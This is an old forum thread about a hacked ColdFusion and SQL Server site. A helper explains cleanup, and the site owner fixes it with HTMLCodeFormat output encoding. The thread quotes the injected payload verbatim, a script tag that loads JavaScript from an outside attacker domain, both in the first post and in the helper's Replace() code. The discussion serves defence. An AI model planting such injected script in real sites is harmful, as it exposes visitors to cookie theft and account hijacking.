Reply to topic
Please help
eriweb


Joined: 06 Apr 2004
Posts: 68
Post Posted: Fri Aug 15, 2008 9:25 pm Reply with quote
I have MS SQL Server 2000, with Colfusion 5. I have converted most of the queries to stored procedure, and our site is getting hacked. They have managed to create a table, and one particular existing table they are appending the following into every row:
Code:
"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--
. I m not an expert at securing application and any help is greatly needed and appreciated. Please help.
Cross-Site Scripting
comprug
Forum Regular

Joined: 15 Feb 2006
Posts: 340
Post Posted: Sat Aug 16, 2008 1:14 pm Reply with quote
Fidel,
what the hackers are attempting to do is quite serious. Basically they are trying to steal your user's cookies, as well as information about their browsers. They are trying to get access to any account that is authenticated over a web form on your site.

As for what they have appended, did they do it to every existing row only, or every existing row, and every new row? If the latter, you have to think about how everything is being appended. It could be at the CF level, or it could be at the MSSQL level. Try creating a row manually, and see if its appended. If so, it goes farther than the CF level. Also, take a look at all your stored procedures, and see if there is anything suspicious in there. Personally, I would not keep a website running that was outputting stuff like that, but taking the site down might not be an option. This will be tedious, but you can use a replace function with all cfoutput tags to replace that bit with nothing:
Code:
<cfoutput>#Replace(ORIGINALOUTPUT,
'"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--', '')#</cfoutput>
Thanks
eriweb


Joined: 06 Apr 2004
Posts: 68
Post Posted: Tue Aug 19, 2008 4:10 pm Reply with quote
Hello Comprug,

Thank you for your help. I ended up surrounding the variable with the HTMLCodeFormat tag, and ever since I added that code I have not seen anything yet. I also did ran the SQL Profiler and didi find some of his query and was running under the Application Name MS SQLEM not sure what that is. I am still running the SQL Profiler just to see if he is trying to get in through some where else.
comprug
Forum Regular

Joined: 15 Feb 2006
Posts: 340
Post Posted: Wed Aug 20, 2008 1:28 pm Reply with quote
Fidel,
it sounds like you found a good solution; HTMLCodeFormat is better than just replacing the code because it will prevent all attacks of this type. Please post again if the problem continues.
eriweb


Joined: 06 Apr 2004
Posts: 68
Post Posted: Wed Aug 20, 2008 10:01 pm Reply with quote
Hello Comprug,

Thanks for your help, ever since I added the HTMLCodeFormat I have not seen anything so hopefully it will stay that way.

But yes I will post again if this issue comes up again, hopefully not.

Thanks.
Please help
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
 		All times are GMT  
Page 1 of 1  
  
  
 Reply to topic